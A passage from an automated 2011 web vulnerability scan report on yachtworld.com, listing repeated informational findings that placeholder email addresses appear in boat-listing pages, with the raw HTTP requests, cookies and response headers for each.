savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:21 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:27 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>b
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.20. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/California/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/California/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:42 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:06:49 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.21. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Connecticut/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Connecticut/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:05 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:11 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.22. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Florida/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Florida/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:33 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:06:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.23. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Maine/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Maine/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:14 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.24. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Maryland/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Maryland/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 